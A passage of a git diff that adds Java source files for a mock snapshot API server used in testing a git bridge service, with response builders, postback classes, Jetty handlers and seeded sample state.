new file mode 100644 index 0000000..0e1f4bc --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/SnapshotResponseBuilder.java @@ -0,0 +1,60 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response; + +import uk.ac.ic.wlgitbridge.snapshot.servermock.exception.InvalidAPICallException; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.getdoc.SnapshotGetDocResponse; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.getforver.SnapshotGetForVerResponse; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.getsavedver.SnapshotGetSavedVersResponse; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.SnapshotPushResponse; +import uk.ac.ic.wlgitbridge.snapshot.servermock.state.SnapshotAPIState; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotResponseBuilder { + + private SnapshotAPIState state; + + public SnapshotResponse buildWithTarget(String target, String method) + throws InvalidAPICallException { + checkPrefix(target); + return parseTarget(target, target.split("/"), method); + } + + private void checkPrefix(String target) throws InvalidAPICallException { + if (!target.startsWith("/api/v0/docs/")) { + throw new InvalidAPICallException(target); + } + } + + private SnapshotResponse parseTarget(String target, String[] parts, String method) + throws InvalidAPICallException { + String projectName = parts[4]; + if (parts.length == 5) { + if (method.equals("GET")) { + return new SnapshotGetDocResponse(state.getStateForGetDoc(projectName)); + } + } else if (parts.length == 6) { + String type = parts[5]; + if (type.equals("snapshots") && method.equals("POST")) { + return new SnapshotPushResponse( + state.getStateForPush(projectName), state.getStateForPostback(projectName)); + } else if (type.equals("saved_vers") && method.equals("GET")) { + return new SnapshotGetSavedVersResponse(state.getStateForGetSavedVers(projectName)); + } + } else if (parts.length == 7) { + if (parts[5].equals("snapshots") && method.equals("GET")) { + try { + return new SnapshotGetForVerResponse( + state.getStateForGetForVers(projectName, Integer.parseInt(parts[6]))); + } catch (NumberFormatException e) { + + } + } + } + throw new InvalidAPICallException(target); + } + + public void setState(SnapshotAPIState state) { + this.state = state; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getdoc/SnapshotGetDocResponse.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getdoc/SnapshotGetDocResponse.java new file mode 100644 index 0000000..11ab415 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getdoc/SnapshotGetDocResponse.java @@ -0,0 +1,21 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.getdoc; + +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.SnapshotResponse; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotGetDocResponse extends SnapshotResponse { + + private final GetDocResult state; + + public SnapshotGetDocResponse(GetDocResult state) { + this.state = state; + } + + @Override + public String respond() { + return state.toJson().toString(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getforver/SnapshotGetForVerResponse.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getforver/SnapshotGetForVerResponse.java new file mode 100644 index 0000000..38a4736 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getforver/SnapshotGetForVerResponse.java @@ -0,0 +1,21 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.getforver; + +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionResult; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.SnapshotResponse; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotGetForVerResponse extends SnapshotResponse { + + private final GetForVersionResult state; + + public SnapshotGetForVerResponse(GetForVersionResult state) { + this.state = state; + } + + @Override + public String respond() { + return state.toJson().toString(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getsavedver/SnapshotGetSavedVersResponse.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getsavedver/SnapshotGetSavedVersResponse.java new file mode 100644 index 0000000..a8da86b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getsavedver/SnapshotGetSavedVersResponse.java @@ -0,0 +1,21 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.getsavedver; + +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersResult; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.SnapshotResponse; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotGetSavedVersResponse extends SnapshotResponse { + + private final GetSavedVersResult state; + + public SnapshotGetSavedVersResponse(GetSavedVersResult state) { + this.state = state; + } + + @Override + public String respond() { + return state.toJson().toString(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/SnapshotPushResponse.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/SnapshotPushResponse.java new file mode 100644 index 0000000..4568f60 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/SnapshotPushResponse.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push; + +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.SnapshotResponse; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data.SnapshotPushResult; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.SnapshotPostbackRequest; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotPushResponse extends SnapshotResponse { + + private final SnapshotPushResult stateForPush; + private final SnapshotPostbackRequest stateForPostback; + + public SnapshotPushResponse( + SnapshotPushResult stateForPush, SnapshotPostbackRequest stateForPostback) { + this.stateForPush = stateForPush; + this.stateForPostback = stateForPostback; + } + + @Override + public String respond() { + return stateForPush.toJson().toString(); + } + + @Override + public String postback() { + if (stateForPush.hasPostback()) { + return stateForPostback.toJson().toString(); + } else { + return null; + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResult.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResult.java new file mode 100644 index 0000000..cdcd893 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResult.java @@ -0,0 +1,30 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data; + +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; + +/* + * Created by Winston on 09/01/15. + */ +public abstract class SnapshotPushResult { + + private final int status; + private final String code; + private final String message; + + public SnapshotPushResult(int status, String code, String message) { + this.status = status; + this.code = code; + this.message = message; + } + + public JsonElement toJson() { + JsonObject jsonThis = new JsonObject(); + jsonThis.addProperty("status", status); + jsonThis.addProperty("code", code); + jsonThis.addProperty("message", message); + return jsonThis; + } + + public abstract boolean hasPostback(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResultOutOfDate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResultOutOfDate.java new file mode 100644 index 0000000..d6b7eea --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResultOutOfDate.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotPushResultOutOfDate extends SnapshotPushResult { + + public SnapshotPushResultOutOfDate() { + super(409, "outOfDate", "Out of Date"); + } + + @Override + public boolean hasPostback() { + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResultSuccess.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResultSuccess.java new file mode 100644 index 0000000..948105b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/data/SnapshotPushResultSuccess.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotPushResultSuccess extends SnapshotPushResult { + + public SnapshotPushResultSuccess() { + super(402, "accepted", "Accepted"); + } + + @Override + public boolean hasPostback() { + return true; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequest.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequest.java new file mode 100644 index 0000000..8560714 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequest.java @@ -0,0 +1,21 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 09/01/15. + */ +public abstract class SnapshotPostbackRequest { + + private final String code; + + public SnapshotPostbackRequest(String code) { + this.code = code; + } + + public JsonObject toJson() { + JsonObject jsonThis = new JsonObject(); + jsonThis.addProperty("code", code); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestError.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestError.java new file mode 100644 index 0000000..27e4b7b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestError.java @@ -0,0 +1,20 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 10/01/15. + */ +public class SnapshotPostbackRequestError extends SnapshotPostbackRequest { + + public SnapshotPostbackRequestError() { + super("error"); + } + + @Override + public JsonObject toJson() { + JsonObject jsonThis = super.toJson(); + jsonThis.addProperty("message", "Unexpected Error"); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestInvalidFiles.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestInvalidFiles.java new file mode 100644 index 0000000..e4bd120 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestInvalidFiles.java @@ -0,0 +1,39 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.util.ArrayList; +import java.util.List; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.invalidfile.InvalidFileError; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotPostbackRequestInvalidFiles extends SnapshotPostbackRequest { + + private final List<InvalidFileError> errors; + + public SnapshotPostbackRequestInvalidFiles(List<InvalidFileError> errors) { + super("invalidFiles"); + this.errors = errors; + } + + public SnapshotPostbackRequestInvalidFiles(JsonArray errors) { + this(new ArrayList<InvalidFileError>()); + for (JsonElement error : errors) { + this.errors.add(InvalidFileError.buildFromJsonError(error.getAsJsonObject())); + } + } + + @Override + public JsonObject toJson() { + JsonObject jsonThis = super.toJson(); + JsonArray jsonErrors = new JsonArray(); + for (InvalidFileError error : errors) { + jsonErrors.add(error.toJson()); + } + jsonThis.add("errors", jsonErrors); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestInvalidProject.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestInvalidProject.java new file mode 100644 index 0000000..fbdfabe --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestInvalidProject.java @@ -0,0 +1,40 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import com.google.gson.JsonPrimitive; +import java.util.ArrayList; +import java.util.List; + +/* + * Created by Winston on 10/01/15. + */ +public class SnapshotPostbackRequestInvalidProject extends SnapshotPostbackRequest { + + private final List<String> errors; + + public SnapshotPostbackRequestInvalidProject(List<String> errors) { + super("invalidProject"); + this.errors = errors; + } + + public SnapshotPostbackRequestInvalidProject(JsonArray errors) { + this(new ArrayList<String>()); + for (JsonElement error : errors) { + this.errors.add(error.getAsString()); + } + } + + @Override + public JsonObject toJson() { + JsonObject jsonThis = super.toJson(); + jsonThis.addProperty("message", "short string message for debugging"); + JsonArray jsonErrors = new JsonArray(); + for (String error : errors) { + jsonErrors.add(new JsonPrimitive(error)); + } + jsonThis.add("errors", jsonErrors); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestOutOfDate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestOutOfDate.java new file mode 100644 index 0000000..43453e8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestOutOfDate.java @@ -0,0 +1,20 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotPostbackRequestOutOfDate extends SnapshotPostbackRequest { + + public SnapshotPostbackRequestOutOfDate() { + super("outOfDate"); + } + + @Override + public JsonObject toJson() { + JsonObject jsonThis = super.toJson(); + jsonThis.addProperty("message", "Out of Date"); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestSuccess.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestSuccess.java new file mode 100644 index 0000000..13778ca --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/SnapshotPostbackRequestSuccess.java @@ -0,0 +1,23 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotPostbackRequestSuccess extends SnapshotPostbackRequest { + + private final int latestVerId; + + public SnapshotPostbackRequestSuccess(int latestVerId) { + super("upToDate"); + this.latestVerId = latestVerId; + } + + @Override + public JsonObject toJson() { + JsonObject jsonThis = super.toJson(); + jsonThis.addProperty("latestVerId", latestVerId); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileError.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileError.java new file mode 100644 index 0000000..670326d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileError.java @@ -0,0 +1,38 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.invalidfile; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 09/01/15. + */ +public abstract class InvalidFileError { + + private final String file; + + public InvalidFileError(String file) { + this.file = file; + } + + public JsonObject toJson() { + JsonObject jsonThis = new JsonObject(); + jsonThis.addProperty("file", file); + jsonThis.addProperty("state", getState()); + return jsonThis; + } + + protected abstract String getState(); + + public static InvalidFileError buildFromJsonError(JsonObject error) { + String state = error.get("state").getAsString(); + String file = error.get("file").getAsString(); + if (state.equals("error")) { + return new InvalidFileErrorDefault(file); + } else if (state.equals("disallowed")) { + return new InvalidFileErrorDisallowed(file); + } else if (state.equals("unclean_name")) { + return new InvalidFileErrorUnclean(file, error.get("cleanFile").getAsString()); + } else { + throw new IllegalArgumentException("bad invalid file state: " + state); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorDefault.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorDefault.java new file mode 100644 index 0000000..644d165 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorDefault.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.invalidfile; + +/* + * Created by Winston on 09/01/15. + */ +public class InvalidFileErrorDefault extends InvalidFileError { + + public InvalidFileErrorDefault(String file) { + super(file); + } + + @Override + protected String getState() { + return "error"; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorDisallowed.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorDisallowed.java new file mode 100644 index 0000000..fad3ac1 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorDisallowed.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.invalidfile; + +/* + * Created by Winston on 09/01/15. + */ +public class InvalidFileErrorDisallowed extends InvalidFileError { + + public InvalidFileErrorDisallowed(String file) { + super(file); + } + + @Override + protected String getState() { + return "disallowed"; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorUnclean.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorUnclean.java new file mode 100644 index 0000000..9c2c75b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/push/postback/invalidfile/InvalidFileErrorUnclean.java @@ -0,0 +1,28 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.invalidfile; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 09/01/15. + */ +public class InvalidFileErrorUnclean extends InvalidFileError { + + private final String cleanFile; + + public InvalidFileErrorUnclean(String file, String cleanFile) { + super(file); + this.cleanFile = cleanFile; + } + + @Override + public JsonObject toJson() { + JsonObject jsonThis = super.toJson(); + jsonThis.addProperty("cleanFile", cleanFile); + return jsonThis; + } + + @Override + protected String getState() { + return "unclean_name"; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockOAuthRequestHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockOAuthRequestHandler.java new file mode 100644 index 0000000..278e15f --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockOAuthRequestHandler.java @@ -0,0 +1,23 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.server; + +import java.io.IOException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; + +public class MockOAuthRequestHandler extends AbstractHandler { + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException { + String method = baseRequest.getMethod(); + if (method.equals("GET") && target.equals("/oauth/token/info")) { + response.setContentType("application/json"); + response.setStatus(HttpServletResponse.SC_OK); + response.getWriter().println("{}"); + baseRequest.setHandled(true); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockSnapshotRequestHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockSnapshotRequestHandler.java new file mode 100644 index 0000000..53727cf --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockSnapshotRequestHandler.java @@ -0,0 +1,46 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.server; + +import java.io.IOException; +import javax.servlet.ServletException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.snapshot.servermock.exception.InvalidAPICallException; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.*; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 09/01/15. + */ +public class MockSnapshotRequestHandler extends AbstractHandler { + + private final SnapshotResponseBuilder responseBuilder; + + public MockSnapshotRequestHandler(SnapshotResponseBuilder responseBuilder) { + this.responseBuilder = responseBuilder; + } + + @Override + public void handle( + String target, + final Request baseRequest, + HttpServletRequest request, + HttpServletResponse response) + throws IOException, ServletException { + boolean handled; + try { + final SnapshotResponse snapshotResponse = + responseBuilder.buildWithTarget(target, baseRequest.getMethod()); + response.getWriter().println(snapshotResponse.respond()); + new PostbackThread(baseRequest.getReader(), snapshotResponse.postback()).startIfNotNull(); + handled = true; + } catch (InvalidAPICallException e) { + handled = false; + } catch (RuntimeException e) { + Log.warn("Runtime exception when handling request", e); + handled = true; + } + baseRequest.setHandled(handled); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockSnapshotServer.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockSnapshotServer.java new file mode 100644 index 0000000..2f1c0d5 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/MockSnapshotServer.java @@ -0,0 +1,65 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.server; + +import java.io.File; +import org.eclipse.jetty.server.NetworkConnector; +import org.eclipse.jetty.server.Server; +import org.eclipse.jetty.server.handler.HandlerCollection; +import org.eclipse.jetty.server.handler.HandlerList; +import org.eclipse.jetty.server.handler.ResourceHandler; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.SnapshotResponseBuilder; +import uk.ac.ic.wlgitbridge.snapshot.servermock.state.SnapshotAPIState; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 09/01/15. + */ +public class MockSnapshotServer { + + private final Server server; + private final SnapshotResponseBuilder responseBuilder; + private int port; + + public MockSnapshotServer(int port, File resourceBase) { + server = new Server(port); + responseBuilder = new SnapshotResponseBuilder(); + + HandlerList handlers = new HandlerList(); + handlers.addHandler(new MockOAuthRequestHandler()); + handlers.addHandler(getHandlerForResourceBase(resourceBase)); + server.setHandler(handlers); + } + + private HandlerCollection getHandlerForResourceBase(File resourceBase) { + HandlerCollection handlers = new HandlerCollection(); + handlers.addHandler(new MockSnapshotRequestHandler(responseBuilder)); + handlers.addHandler(resourceHandlerWithBase(resourceBase)); + return handlers; + } + + private ResourceHandler resourceHandlerWithBase(File resourceBase) { + ResourceHandler resourceHandler = new ResourceHandler(); + resourceHandler.setResourceBase(resourceBase.getAbsolutePath()); + return resourceHandler; + } + + public void start() { + try { + server.start(); + } catch (Exception e) { + Log.warn("Exception when trying to start server", e); + } + port = ((NetworkConnector) server.getConnectors()[0]).getLocalPort(); + } + + public void stop() { + try { + server.stop(); + } catch (Exception e) { + Log.warn("Exception when trying to stop server", e); + } + } + + public void setState(SnapshotAPIState state) { + responseBuilder.setState(state); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/PostbackThread.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/PostbackThread.java new file mode 100644 index 0000000..0e105ef --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/server/PostbackThread.java @@ -0,0 +1,42 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.server; + +import static org.asynchttpclient.Dsl.*; + +import com.google.gson.Gson; +import com.google.gson.JsonObject; +import java.io.Reader; +import java.util.concurrent.ExecutionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 10/01/15. + */ +public class PostbackThread extends Thread { + + private String url; + private String postback; + + public PostbackThread(Reader reader, String postback) { + if (postback != null) { + url = new Gson().fromJson(reader, JsonObject.class).get("postbackUrl").getAsString(); + this.postback = postback; + } + } + + @Override + public void run() { + try { + asyncHttpClient().preparePost(url).setBody(postback).execute().get().getResponseBody(); + } catch (InterruptedException e) { + Log.warn("Interrupted on postback, url: " + url + ", postback: " + postback, e); + } catch (ExecutionException e) { + Log.warn("ExecutionException on postback, url: " + url + ", postback: " + postback, e); + } + } + + public void startIfNotNull() { + if (url != null && postback != null) { + start(); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/state/SnapshotAPIState.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/state/SnapshotAPIState.java new file mode 100644 index 0000000..fa8c9b7 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/state/SnapshotAPIState.java @@ -0,0 +1,271 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.state; + +import java.util.*; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotAttachment; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotData; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotFile; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersResult; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.SnapshotInfo; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data.SnapshotPushResult; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.data.SnapshotPushResultSuccess; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.SnapshotPostbackRequest; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.postback.SnapshotPostbackRequestInvalidProject; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotAPIState { + + private Map<String, GetDocResult> getDoc; + private Map<String, GetSavedVersResult> getSavedVers; + private Map<String, Map<Integer, GetForVersionResult>> getForVers; + private Map<String, SnapshotPushResult> push; + private Map<String, SnapshotPostbackRequest> postback; + + public SnapshotAPIState( + Map<String, GetDocResult> getDoc, + Map<String, GetSavedVersResult> getSavedVers, + Map<String, Map<Integer, GetForVersionResult>> getForVers, + Map<String, SnapshotPushResult> push, + Map<String, SnapshotPostbackRequest> postback) { + this.getDoc = getDoc; + this.getSavedVers = getSavedVers; + this.getForVers = getForVers; + this.push = push; + this.postback = postback; + } + + public SnapshotAPIState() { + getDoc = new HashMap<>(); + getDoc.put( + "1826rqgsdb", + new GetDocResult(null, 243, "2014-11-30T18:40:58Z", "jdleesmiller+1@gmail.com", "John+1")); + + getSavedVers = new HashMap<String, GetSavedVersResult>(); + List<SnapshotInfo> savedVers = new LinkedList<SnapshotInfo>(); + savedVers.add( + new SnapshotInfo( + 243, + "added more info on doc GET and error details", + "jdleesmiller+1@gmail.com", + "John+1", + "2014-11-30T18:47:01Z")); + savedVers.add( + new SnapshotInfo( + 185, + "with more details on POST request", + "jdleesmiller+1@gmail.com", + "John+1", + "2014-11-11T17:18:40Z")); + savedVers.add( + new SnapshotInfo( + 175, + "with updated PUT/POST request", + "jdleesmiller+1@gmail.com", + "John+1", + "2014-11-09T23:09:13Z")); + savedVers.add( + new SnapshotInfo( + 146, + "added PUT format", + "jdleesmiller@gmail.com", + "John Lees-Miller", + "2014-11-07T15:11:35Z")); + savedVers.add( + new SnapshotInfo( + 74, + "with example output", + "jdleesmiller@gmail.com", + "John Lees-Miller", + "2014-11-05T18:09:41Z")); + savedVers.add( + new SnapshotInfo( + 39, + "with more files", + "jdleesmiller@gmail.com", + "John Lees-Miller", + "2014-11-05T18:02:19Z")); + savedVers.add( + new SnapshotInfo( + 24, + "first draft", + "jdleesmiller@gmail.com", + "John Lees-Miller", + "2014-11-05T17:56:58Z")); + getSavedVers.put("1826rqgsdb", new GetSavedVersResult(savedVers)); + + getForVers = + new HashMap<String, Map<Integer, GetForVersionResult>>() { + { + put( + "1826rqgsdb", + new HashMap<Integer, GetForVersionResult>() { + { + put( + 243, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + 